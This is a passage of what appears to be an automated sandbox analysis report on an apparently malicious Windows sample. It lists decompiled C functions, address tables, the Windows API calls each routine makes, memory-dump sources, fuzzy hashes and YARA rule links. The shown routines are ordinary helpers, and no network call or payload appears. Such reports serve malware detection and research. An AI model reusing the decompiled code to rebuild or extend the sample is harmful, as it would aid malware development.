				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                            0x00dd67c7
                                                            0x00dd67d3
                                                            0x00dd67d9
                                                            0x00dd67de
                                                            0x00dd67e2
                                                            0x00dd6954
                                                            0x00dd6958
                                                            0x00dd6958
                                                            0x00dd67e8
                                                            0x00dd67ec
                                                            0x00dd67f2
                                                            0x00dd67f3
                                                            0x00dd67fe
                                                            0x00dd6804
                                                            0x00dd6809
                                                            0x00dd680c
                                                            0x00dd6826
                                                            0x00dd6835
                                                            0x00dd6841
                                                            0x00dd684b
                                                            0x00dd6850
                                                            0x00dd6852
                                                            0x00dd6855
                                                            0x00dd690c
                                                            0x00dd6912
                                                            0x00dd6923
                                                            0x00dd6936
                                                            0x00dd694c
                                                            0x00000000
                                                            0x00dd6951
                                                            0x00dd685e
                                                            0x00dd6865
                                                            0x00dd6869
                                                            0x00dd686f
                                                            0x00dd6871
                                                            0x00dd6873
                                                            0x00dd6875
                                                            0x00dd6877
                                                            0x00dd6881
                                                            0x00dd6886
                                                            0x00dd6888
                                                            0x00dd688a
                                                            0x00dd688b
                                                            0x00dd688c
                                                            0x00dd688d
                                                            0x00dd6894
                                                            0x00dd689b
                                                            0x00dd689e
                                                            0x00dd689e
                                                            0x00dd686b
                                                            0x00dd686b
                                                            0x00dd686b
                                                            0x00dd68a6
                                                            0x00dd68ae
                                                            0x00dd68ba
                                                            0x00dd68bf
                                                            0x00dd68bf
                                                            0x00dd68c4
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd68c6
                                                            0x00dd68c9
                                                            0x00dd68d6
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd68d8
                                                            0x00dd68d8
                                                            0x00dd68e5
                                                            0x00dd68bf
                                                            0x00dd68c4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd68c4
                                                            0x00dd68ef
                                                            0x00dd68f2
                                                            0x00dd68f5
                                                            0x00dd68fc
                                                            0x00dd68fc
                                                            0x00dd6909
                                                            0x00000000
                                                            0x00dd6909
                                                            0x00dd67f5
                                                            0x00dd67f9
                                                            0x00dd67fa
                                                            0x00dd67fc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd67fc
                                                            0x00000000

                                                            APIs
                                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00DD6877
                                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00DD688D
                                                            • memset.NTDLL ref: 00DD6936
                                                            • memset.NTDLL ref: 00DD694C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: memset$_allmul_aulldiv
                                                            • String ID:
                                                            • API String ID: 3041852380-0
                                                            • Opcode ID: 1cf9a44f377ccb3aedae05fe1a8205cb9935eba53fc0179e422d17bcc31ea48c
                                                            • Instruction ID: 4224913d39d83809a90e17cf256a9d923e095f04e0d3a0c561f26f6bc1bf0fe4
                                                            • Opcode Fuzzy Hash: 1cf9a44f377ccb3aedae05fe1a8205cb9935eba53fc0179e422d17bcc31ea48c
                                                            • Instruction Fuzzy Hash: 6C418D31A00219BFDB20DF68CC41BEE7765EF45310F10416AB959A7381DB70EE558BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456ED66, Relevance: 6.1, APIs: 4, Instructions: 129stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCommandLineA.KERNEL32(?,00000000,00000000,?,00000000,0457227C,00000000,73BCF5B0,0456824E,?,00000001), ref: 0456ED76
                                                            • StrChrA.SHLWAPI(00000000,00000020,?,00000000,0457227C,00000000,73BCF5B0,0456824E,?,00000001), ref: 0456ED87
                                                              • Part of subcall function 0457BAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04574A41,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000), ref: 0457BAED
                                                              • Part of subcall function 0457BAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0457BB10
                                                              • Part of subcall function 0457BAE4: memset.NTDLL ref: 0457BB1F
                                                            • ExitProcess.KERNEL32 ref: 0456EED5
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,7656D3B0,049BB17C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B5D
                                                              • Part of subcall function 04580B38: StrTrimA.SHLWAPI(00000000,0458847C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B7C
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B88
                                                            • lstrcmp.KERNEL32(00000000,?), ref: 0456EDF3
                                                              • Part of subcall function 0457CC4A: FindFirstFileW.KERNEL32(?,?,?,?), ref: 0457CCD6
                                                              • Part of subcall function 0457CC4A: lstrlenW.KERNEL32(?), ref: 0457CCF2
                                                              • Part of subcall function 0457CC4A: lstrlenW.KERNEL32(?), ref: 0457CD0A
                                                              • Part of subcall function 0457CC4A: lstrcpyW.KERNEL32(00000000,?), ref: 0457CD23
                                                              • Part of subcall function 0457CC4A: lstrcpyW.KERNEL32(00000002), ref: 0457CD38
                                                              • Part of subcall function 0457CC4A: FindNextFileW.KERNEL32(?,00000010), ref: 0457CD60
                                                              • Part of subcall function 0457CC4A: FindClose.KERNEL32(00000002), ref: 0457CD6E
                                                              • Part of subcall function 0457CC4A: FreeLibrary.KERNEL32(?), ref: 0457CD80
                                                              • Part of subcall function 04579976: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04579999
                                                              • Part of subcall function 04579976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000000E,?,?,0456EE33,?,?,00000000,0457227C,00000000,73BCF5B0,0456824E), ref: 045799DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Findlstrlen$FileFreeHeaplstrcpy$AllocateCloseCommandExitFirstLibraryLineNextProcessTrimlstrcmpmemcpymemset
                                                            • String ID:
                                                            • API String ID: 2123058440-0
                                                            • Opcode ID: 9f93b3f5d88008d272ac1512a25c420803dbdee23c6bc7b3b056998ad9668d82
                                                            • Instruction ID: 2c5ba552efc7a4c12331eed7d9669bc10f7ae70f8ec4edfbeb094fec33ef7982
                                                            • Opcode Fuzzy Hash: 9f93b3f5d88008d272ac1512a25c420803dbdee23c6bc7b3b056998ad9668d82
                                                            • Instruction Fuzzy Hash: 77417B75604202EFE710EF75E88592BB7E9FB84618F00483DF556E3150EE35ED09AB12
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04577FB3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 108stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04575CE8: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,0456908A), ref: 04575CF4
                                                              • Part of subcall function 04575CE8: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0457786C,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 04575D52
                                                              • Part of subcall function 04575CE8: lstrcpy.KERNEL32(00000000,00000000), ref: 04575D62
                                                            • lstrlen.KERNEL32(?,00000000,00000000,00000004,00000000,?), ref: 04578002
                                                            • wsprintfA.USER32 ref: 04578032
                                                            • GetLastError.KERNEL32 ref: 045780A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
                                                            • String ID: `
                                                            • API String ID: 324226357-1850852036
                                                            • Opcode ID: b3df6f88ee0152b0a1320f16cf7c1a10ddacc4d7cebf4488b89575b9b22c45d7
                                                            • Instruction ID: 6c59cef78a1534cc17ed503cf460035c710f8155c0bd3aa714dec82118dcc787
                                                            • Opcode Fuzzy Hash: b3df6f88ee0152b0a1320f16cf7c1a10ddacc4d7cebf4488b89575b9b22c45d7
                                                            • Instruction Fuzzy Hash: B331B37150020AEBDB21AF66EC84A9B3BF8FF54354F104439F916A7250DB75F924AB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457F997, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 0457FAB7
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetLastError.KERNEL32 ref: 0457FA2B
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0457FA3B
                                                            • GetLastError.KERNEL32 ref: 0457FA5B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 35602742-0
                                                            • Opcode ID: 1a83bee23c1f5fd75742172519ad2ecd94d48d3bdee43c8e03cd7dadd7cd8a65
                                                            • Instruction ID: 8e9d8287ac96c7e0593c441f112d05493704c267b2c6a3f8cf5e3faee3e9caa8
                                                            • Opcode Fuzzy Hash: 1a83bee23c1f5fd75742172519ad2ecd94d48d3bdee43c8e03cd7dadd7cd8a65
                                                            • Instruction Fuzzy Hash: B84108B2901209EFDF10DFA4E9849AEBBB9FF04345B24447AE401E7150EB35AE44EB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457F774, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045752CD: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 045752DB
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457F7DC
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0457F82B
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,0457F1B3,00000000,0457F1B4,00000080,00000000,00000000,04584C6A,00000000,0457F1B3,?), ref: 0457537E
                                                              • Part of subcall function 0457533D: GetLastError.KERNEL32 ref: 04575388
                                                              • Part of subcall function 0457533D: WaitForSingleObject.KERNEL32(000000C8), ref: 045753AD
                                                              • Part of subcall function 0457533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 045753CE
                                                              • Part of subcall function 0457533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 045753F6
                                                              • Part of subcall function 0457533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 0457540B
                                                              • Part of subcall function 0457533D: SetEndOfFile.KERNEL32(00000001), ref: 04575418
                                                              • Part of subcall function 0457533D: CloseHandle.KERNEL32(00000001), ref: 04575430
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000101,?,?,?,04567236,?,?,?,?,?,00000000), ref: 0457F860
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,04567236,?,?,?,?,?,00000000,?,00000000,?,04564A91), ref: 0457F870
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                                            • String ID:
                                                            • API String ID: 4200334623-0
                                                            • Opcode ID: d52e958a48c8a484bd7179ea0d933965e03797a19acb850a85d63bde56204dbd
                                                            • Instruction ID: 61149f055e5bd1fd51f29a28d72f88ebfe8f7b3e58bfd7d30cea6174f16f5215
                                                            • Opcode Fuzzy Hash: d52e958a48c8a484bd7179ea0d933965e03797a19acb850a85d63bde56204dbd
                                                            • Instruction Fuzzy Hash: E631F476900119FFEB109FA5DC88CAEBBBDFB08354B100069F500A7251DB75AE54EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04581435, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0458148E
                                                            • memcpy.NTDLL(00000018,?,?), ref: 045814B7
                                                            • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00019D73,00000000,000000FF,00000008), ref: 045814F6
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04581509
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                                            • String ID:
                                                            • API String ID: 2780211928-0
                                                            • Opcode ID: 5729b7c6296fa3d73070b7e41a733d5b6ba10a9e56fe87dd56bb5730f4edc825
                                                            • Instruction ID: 96d4cd6fbd943cfd2d03a54eede7be9b352d5499fff739eefb6435e23577e44a
                                                            • Opcode Fuzzy Hash: 5729b7c6296fa3d73070b7e41a733d5b6ba10a9e56fe87dd56bb5730f4edc825
                                                            • Instruction Fuzzy Hash: C3313E70200606AFDB219F29EC44E9A7BB9FB09764F00452DF916E6290DB74ED15EFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045630C0, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?), ref: 045630EF
                                                            • SetEvent.KERNEL32(?), ref: 04563139
                                                            • TlsSetValue.KERNEL32(00000001), ref: 04563173
                                                            • TlsSetValue.KERNEL32(00000000), ref: 0456318F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Value$Event
                                                            • String ID:
                                                            • API String ID: 3803239005-0
                                                            • Opcode ID: 49e785d2e9b1a09cd1f5ca32ab12718979d8f2a2b24d9da322af91226bb2aada
                                                            • Instruction ID: ea974f00a658fec5e3aca8c2f94a33e00e9d2e6dab271d3f45c64ad10247bd95
                                                            • Opcode Fuzzy Hash: 49e785d2e9b1a09cd1f5ca32ab12718979d8f2a2b24d9da322af91226bb2aada
                                                            • Instruction Fuzzy Hash: E8219F71200204EFDB228F18EC88A6A7BA6FB41360B104928F917D72A0D771FC56FF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04568E77, Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045833D9: memcpy.NTDLL(00000000,00000110,04575AB0,04575AB0,?,00000000,00000001,00000000,73B74D40), ref: 0458340F
                                                              • Part of subcall function 045833D9: memset.NTDLL ref: 04583485
                                                              • Part of subcall function 045833D9: memset.NTDLL ref: 04583499
                                                            • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 04568ECF
                                                            • lstrcmpi.KERNEL32(00000000,?), ref: 04568EF6
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 04568F3B
                                                            • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 04568F4C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                                            • String ID:
                                                            • API String ID: 1065503980-0
                                                            • Opcode ID: 34e784f014cf1cbd3a44406f5ac522610f25664f98a022cff8d59164f81a42d4
                                                            • Instruction ID: a583165e7dd7abd69b37438ad90f4bbc66ea4ba555c3c2b0f2586efa00ef61dc
                                                            • Opcode Fuzzy Hash: 34e784f014cf1cbd3a44406f5ac522610f25664f98a022cff8d59164f81a42d4
                                                            • Instruction Fuzzy Hash: 30214A71A00206EBDF11AFA5EC84EAD7BB9FB44358F004069F906AB251DA35BD58FB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045833D9, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • memcpy.NTDLL(00000000,00000110,04575AB0,04575AB0,?,00000000,00000001,00000000,73B74D40), ref: 0458340F
                                                            • memset.NTDLL ref: 04583485
                                                            • memset.NTDLL ref: 04583499
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset$AllocateHeapmemcpy
                                                            • String ID: {l0u
                                                            • API String ID: 1529149438-597588357
                                                            • Opcode ID: 06dd9415accd1e1e6c5edcb448ec0662c9f9faf239f0d6f9687a7e77b1fe0701
                                                            • Instruction ID: aaa2583979a431d243435951aaaee7ea84800c7fd1c61eef44bad3ff565d8161
                                                            • Opcode Fuzzy Hash: 06dd9415accd1e1e6c5edcb448ec0662c9f9faf239f0d6f9687a7e77b1fe0701
                                                            • Instruction Fuzzy Hash: 2E217175A00119ABEF01AFA9DC44FEE7BB8FF44614F044069FD04E6250EB35AA00DBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD4671, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E00DD4671(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E00DD77D7(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                            0x00dd467d
                                                            0x00dd4681
                                                            0x00dd4682
                                                            0x00dd4683
                                                            0x00dd4685
                                                            0x00dd4687
                                                            0x00dd468c
                                                            0x00dd468f
                                                            0x00dd4726
                                                            0x00dd472d
                                                            0x00dd472d
                                                            0x00dd4698
                                                            0x00dd469f
                                                            0x00dd46af
                                                            0x00dd46af
                                                            0x00dd46b5
                                                            0x00dd46b7
                                                            0x00dd46bc
                                                            0x00dd46c5
                                                            0x00dd46cd
                                                            0x00dd46d0
                                                            0x00dd46db
                                                            0x00dd46df
                                                            0x00dd46e1
                                                            0x00dd46e2
                                                            0x00dd46eb
                                                            0x00dd46ef
                                                            0x00dd4700
                                                            0x00dd46f1
                                                            0x00dd46f6
                                                            0x00dd46fb
                                                            0x00dd470a
                                                            0x00dd470a
                                                            0x00dd46df
                                                            0x00dd4710
                                                            0x00dd4716
                                                            0x00dd4716
                                                            0x00dd471f
                                                            0x00dd4724
                                                            0x00dd4724
                                                            0x00000000

                                                            APIs
                                                            • Sleep.KERNEL32(000000C8), ref: 00DD469F
                                                            • lstrlenW.KERNEL32(?), ref: 00DD46D5
                                                            • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00DD46F6
                                                            • SysFreeString.OLEAUT32(?), ref: 00DD470A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeSleepStringlstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 1198164300-0
                                                            • Opcode ID: c1720247ac78a2fc8854b47a44ace41cec78347d8ef8059cbf334bed914873a4
                                                            • Instruction ID: ab6c8e2f1a72f5cf7053d718c496c7468020a5ffedf7ec6acaf9b8f73ccc8035
                                                            • Opcode Fuzzy Hash: c1720247ac78a2fc8854b47a44ace41cec78347d8ef8059cbf334bed914873a4
                                                            • Instruction Fuzzy Hash: EA212C75901209FFCB10DFA4D884A9EBBB8FF49315B1441AAE945D7310E731AA45CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04568CD3, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04568D02
                                                            • lstrlen.KERNEL32(00000000), ref: 04568D12
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • strcpy.NTDLL ref: 04568D29
                                                            • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 04568D33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AllocateHeaplstrlenmemsetstrcpy
                                                            • String ID:
                                                            • API String ID: 528014985-0
                                                            • Opcode ID: 68dda4ba5408d6b9bfa55a1ec79f65eef947849c2cc41569d30798d3e7c8cf39
                                                            • Instruction ID: bd3e2eb94d68a2bf9b2545459d0c8c04b3a26982186b9498c5b8258e338e07f6
                                                            • Opcode Fuzzy Hash: 68dda4ba5408d6b9bfa55a1ec79f65eef947849c2cc41569d30798d3e7c8cf39
                                                            • Instruction Fuzzy Hash: CE21BEB1201302BFE7206F24E848B2A77BCFF54715F00841DF95797241EF79E844AA61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04583EDA, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(049BB148), ref: 04583EF0
                                                            • RtlLeaveCriticalSection.NTDLL(049BB148), ref: 04583F0B
                                                            • GetLastError.KERNEL32 ref: 04583F79
                                                            • GetLastError.KERNEL32 ref: 04583F88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: 29b602d787d49c84b972f20c6bcc7a32b1733d02e88b611a6e056e5b10c18042
                                                            • Instruction ID: 0ab4feaa3d5da6a3f426be98e871062e2737f8da104e8c535889cb99af746dab
                                                            • Opcode Fuzzy Hash: 29b602d787d49c84b972f20c6bcc7a32b1733d02e88b611a6e056e5b10c18042
                                                            • Instruction Fuzzy Hash: 7C212B35501208EFCB12DFA4D844A9EBBB8FF44B11F108159F806A6251DB39EE15EBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045687FC, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 0456881E
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 04568862
                                                            • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 045688A5
                                                            • CloseHandle.KERNEL32(?,?,?,?,?), ref: 045688C8
                                                              • Part of subcall function 0456DD60: GetTickCount.KERNEL32 ref: 0456DD70
                                                              • Part of subcall function 0456DD60: CreateFileW.KERNEL32(04561DEA,80000000,00000003,0458C1A8,00000003,00000000,00000000,?,04561DEA,?), ref: 0456DD8D
                                                              • Part of subcall function 0456DD60: GetFileSize.KERNEL32(04561DEA,00000000,?,00000001,?,04561DEA,?), ref: 0456DDC0
                                                              • Part of subcall function 0456DD60: CreateFileMappingA.KERNEL32(04561DEA,0458C1A8,00000002,00000000,00000000,04561DEA), ref: 0456DDD4
                                                              • Part of subcall function 0456DD60: lstrlen.KERNEL32(04561DEA,?,04561DEA,?), ref: 0456DDF0
                                                              • Part of subcall function 0456DD60: lstrcpy.KERNEL32(?,04561DEA), ref: 0456DE00
                                                              • Part of subcall function 0456DD60: HeapFree.KERNEL32(00000000,04561DEA,?,04561DEA,?), ref: 0456DE1B
                                                              • Part of subcall function 0456DD60: CloseHandle.KERNEL32(04561DEA,?,00000001,?,04561DEA), ref: 0456DE2D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                                            • String ID:
                                                            • API String ID: 3239194699-0
                                                            • Opcode ID: fedc8f37d610c51c7e9cc7a20f855a969c00b8f291d00c932bb0acef0d5bd571
                                                            • Instruction ID: 520d01abea06e67b6b46b0feb2636c65b822ac7053280d6448c61d9bd8588550
                                                            • Opcode Fuzzy Hash: fedc8f37d610c51c7e9cc7a20f855a969c00b8f291d00c932bb0acef0d5bd571
                                                            • Instruction Fuzzy Hash: 8F213D31500209DBEB21EFA5ED44DDE7BB9FF84394F140525F91AA3161E730A546EB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04574A5B, Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04568C4E: GetTickCount.KERNEL32 ref: 04568C64
                                                              • Part of subcall function 04568C4E: wsprintfA.USER32 ref: 04568CA5
                                                              • Part of subcall function 04568C4E: GetModuleHandleA.KERNEL32(00000000), ref: 04568CB7
                                                            • GetModuleHandleA.KERNEL32(00000000,?), ref: 04574A82
                                                            • GetLastError.KERNEL32 ref: 04574A9C
                                                            • RtlExitUserThread.NTDLL(?), ref: 04574AB6
                                                            • GetLastError.KERNEL32 ref: 04574AF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
                                                            • String ID:
                                                            • API String ID: 1798890819-0
                                                            • Opcode ID: 9e7e1e17c2dfccaa8b205de31102b77860c45975430d9a314767d8a598a85189
                                                            • Instruction ID: eb01d7af504c431732bbd361a15ae398bcb2b49157a729de43e5de300a708ca6
                                                            • Opcode Fuzzy Hash: 9e7e1e17c2dfccaa8b205de31102b77860c45975430d9a314767d8a598a85189
                                                            • Instruction Fuzzy Hash: 8E115971101245BF9710AF66EC48D7BBBBDFA86761B040A2DF862D2150DB24AC09AB76
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04566CE6, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0457B54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,0456138B,00000000,0458C16C,00000000), ref: 0457B572
                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04566D38
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0457E1A6,?), ref: 04566D4A
                                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0457E1A6,?), ref: 04566D62
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,0457E1A6,?), ref: 04566D7D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleModuleNamePointerRead
                                                            • String ID:
                                                            • API String ID: 1352878660-0
                                                            • Opcode ID: db2445d62106c11a5fdad0ff894d4e5aa625cb6749a670a48dca797df797fa9e
